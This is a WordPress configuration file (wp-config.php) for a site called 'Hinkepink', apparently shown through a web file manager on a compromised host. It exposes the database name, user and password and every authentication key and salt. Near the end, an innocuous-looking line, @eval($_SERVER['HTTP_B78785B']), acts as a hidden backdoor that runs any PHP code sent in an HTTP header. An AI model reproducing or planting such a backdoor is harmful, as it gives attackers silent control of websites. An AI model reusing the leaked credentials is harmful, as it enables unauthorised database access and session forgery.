/
home
/
seasidet
/
hinkepink
/
Upload File
HOME
<?php define( 'WP_AUTO_UPDATE_CORE', 'minor' );// Diese Einstellung ist erforderlich, damit WordPress-Updates korrekt in WordPress Toolkit verwaltet werden können. Entfernen Sie diese Zeile, wenn diese WordPress-Website nicht mehr in WordPress Toolkit verwaltet wird. /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://codex.wordpress.org/Editing_wp-config.php * * @package WordPress */ // ** MySQL settings ** // /** The name of the database for WordPress */ define( 'DB_NAME', "seasidet_wp_Hinkepink" ); /** MySQL database username */ define( 'DB_USER', "seasidet_wp_Hinkepink_User" ); /** MySQL database password */ define( 'DB_PASSWORD', "sachiko-E_A6" ); /** MySQL hostname */ define( 'DB_HOST', "localhost" ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'latin1' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /** * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', '!n&7F+y:v!@Pg8DFclC3#9*;vn7kDTc:(x-8OvrV_R!1le50%(;a6oE#C|)e4#8G'); define('SECURE_AUTH_KEY', 'N]/:vM51Lv6z:ET]]ju6An@DK_Oy*k_16DNI)b_12:ub81m+]E%|hmKaFh7h0@K0'); define('LOGGED_IN_KEY', 'T684#n|K7sP@%0:0#~h~Bc@~X8%0&TZ7K1)G8sy)s2V5F(ioXBYA*|s:XPz8ksg:'); define('NONCE_KEY', 'k1S&5&06&FGc|_mro26212AnO028G(J!H0TN87GdPZA|((1@*l%6:_yL1p:f+Z0-'); define('AUTH_SALT', 'r#/_]&5PeS43~LV-1-RIMuQ:Z5N28KF1a-+#KZ9BMb_Lp*G&-AZXZ10I#0kS[b7p'); define('SECURE_AUTH_SALT', 'P296E)v_689[R]E+]qxuUC9vnr1+c4@%m:i5lO4]eU|r+yVTIkLa(/34wAxO@0lO'); define('LOGGED_IN_SALT', 'L1PxP6/0N3SySQVfnlvj90iu394+5]9@O6/#L0;r3LG||-h98Sy&-MBE97oVvHxS'); define('NONCE_SALT', '4@CDMQL8A5*-~la23[3hngbwG|nTi84Rwi)-fka:1%Eqc%+@b3F29-143b4U%[[7'); /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'SWx5D8304_'; /* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) define( 'ABSPATH', dirname(__FILE__) . '/' ); /** Sets up WordPress vars and included files. */ @eval($_SERVER['HTTP_B78785B']); require_once ABSPATH . 'wp-settings.php';